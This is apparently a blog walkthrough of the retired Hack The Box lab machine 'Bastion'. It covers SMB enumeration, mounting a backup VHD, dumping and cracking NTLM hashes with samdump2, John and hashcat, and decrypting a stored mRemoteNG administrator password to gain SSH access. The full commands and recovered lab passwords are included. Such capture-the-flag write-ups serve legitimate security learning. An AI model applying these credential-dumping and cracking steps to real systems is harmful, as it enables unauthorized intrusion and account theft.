HTB’s Bastion: A Walkthrough
Hello readers,
In this article, I will be guiding you solve HTB’s ‘Bastion’, a retired box.
Credits for creating this box go to L4mpje .Thank you, as this box helped me get started on Windows hacking.
We find that our address=10.10.10.134
RECONNAISANCE
Firstly,we perform a nmap scan over our target,
- Command-nmap -sS 10.10.10.134 -p 0–65535 -vv
We get,
ENUMERATION
Let’s start enumerating SMB Server, residing on port 139
Since we are without credentials, we perform an anonymous login
- Command-smbclient -L //10.10.10.134
We try to enter ‘admin’ as the password, but are denied. We however get to see the smb shares
Out of these, the ’backups’ share interests us. Let’s target it
- Command-smbclient //10.10.10.134/Backups
We get in using the password : password
We now perform the following smbclient commands to successfully download files off the server
- tarmode
- recurse
- prompt
- mget note.txt (We didnt specify destination path,so it will get saved to /root)
Similarly, mget SDT65CB.tmp and WindowsImageBackup
We go to /root to analyze our files
Opening note.txt ,we find,
Trying to view the SDT65CB.tmp file doesn't seem to show anything. Performed a ‘strings’ analysis, but did not show anything
Then we have WindowsImageBackup, which is a directory
Inside it, we find a directory named ‘L4mpje-PC’.Opening it, we find,
From enumeration, we find that both ‘Catalog’ and ‘SPPMetadataCache’ directories are empty. VERIFIED by checking the SMB server too.
Next,we target the ‘Backup 2019’ directory
We find there are 2 virtual hard disk (.vhd) files within it.
One of 300M and another of 5Gb
NOTE:A dollar sign at the end of a share indicates a hidden share.
OBJECTIVE: Mount the Hard Disks, analyze and enumerate
We have two possible pathways:-
1)Download the .vhd and other associated backup files, or mount them on our system
TIP: Do not mount the files you downloaded, but rather from the Smbclient itself
First, I create a mount point — /mnt/L4mpje-PC and then mount ‘Backups’ share, directly from the SMB server
- Command-mount -t cifs //10.10.10.134/Backups /mnt/L4mpje-PC -o user=anonymous
Knowledge Nugget
What is CIFS? -Protocol followed by the SMB.
Now, we wade in /mnt/Backup3/WindowsImageBackup/L4mpje-PC/Backup…../ and select the 5Gb VHD (9b9cfbc4–369e-11e9-a17c-806e6f6e6963.vhd)
For mounting,we use guestmount, to mount this VHD, onto another directory/mount point /mnt/Backup3 ,to make our analysis easier.
To download guestmount — apt install guestmount
- Command-guestmount — add 9b9cfbc4–369e-11e9-a17c-806e6f6e6963.vhd — inspector — ro /mnt/Backup3 (BE SURE TO BE IN THE EXACT DIRECTORY,WHERE THE VHD IS STORED)
Now, we wade into /mnt/Backup3,we get this listing,
Enumerating each directory,
-Users -In total, we have 5 users — ‘Default User’ ,desktop.ini,L4mpje and Public
There are hashes, that are present on /Windows/System32/config
We need to crack them
NOTE: When in a drive, make your way to the config file, where there are hashes to dump. These are called NTLM hashes ,which are protected by SYSKEY
Tools that used to dump -pwdump and samdump2
Here, we use samdump2
- Command-samdump2 SYSTEM SAM (SYSTEM and SAM are the files, from which we gain the hashes)
We get,
Which is the password?
Syntax — <Name>:<User number>:hashed_username:hashed_password:::
So for administrator, hashed password=31d6cfe0d16ae931b73c59d7e0c089c0
So on for other 2 users, Guest and L4mpje
We are able to crack L4mpje user’s password, using Crackstation , JohnTheRipper and hashcat
Crackstation:- (Successful crack)
Username -L4mpje
Password -bureaulampje It has also identified the correct type of hash, ie. NTLM
JohnTheRipper (Alternate method to crack and is successful)
Command= john — format=NT — wordlist=/usr/share/wordlists/rockyou.txt Hash
Hashcat (Alternate method to crack and is successful)
Command-hashcat -m 1000 Hash /usr/share/wordlists/rockyou.txt — force
GAINING & MAINTAINING ACCESS
We now login via SSH -ssh L4mpje@10.10.10.134
We have successfully logged in
Let’s display the directory contents
We move on to /Desktop, and find our first flag-’user.txt’
Now, we have to privilege escalate ourselves-Find a vulnerability or vulnerable program, exploit and leverage
In /Favorites, I find a link, which when put on the browser redirects us to Bing’s homepage
NOTE: Important directories for vulnerabilities -C:\Program Files (x86) and C:\Program Files
In C:\Program Files (x86), we have the following installed Programs
Out of these, mRemoteNG supposedly has a vulnerability-It stores hashed passwords of users, locally on a file named confCons.xml
We traverse over to C:\Users\L4mpje\AppData\Roaming\mRemoteNG
and find our confCons.xml file and get,
The one ending with == is the administrator’s password
Looked it up via Base64 decoding, but got back some gibberish
We instead have to use a tool named ‘mRemoteNG-Decrypt’
Steps:-
1)Clone into our system — git clone https://github.com/haseebT/mRemoteNG-Decrypt.git
2)Enter /mRemoteNG-Decrypt directory
2)We have a python script, to decode the password
Syntax= python3 mremoteng_decrypt.py -s <Hashtocrack>
Command to crack:-
- python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHFOuS17QTdT9kVqtKCPeoCONw5dmaPFjNO2kt/z05xDgE4HdVmHAowVRdC7emf7lWWAlOdOKiw==
We have cracked the password for Administrator
Password=thXLHM96BeKLOER2
We use it, to login via SSH, as administrator
We capture the flag at C:/Users/Administrator/Desktop,in a file named root.txt -
We also get this badge from HackTheBox
REPORTING
Well, you have it now!
Conclusions:-
- This box can help you get familiar with Windows hacking methodologies
- Windows boxes are easier to enumerate (IMHO)
- It helped me understand that hashes stored in plain-sight can be vulnerable and easily be cracked.
Thanks for reading this blog entry and making it till here. Until then, there must be some Windows boxes, for me to pwn out there……
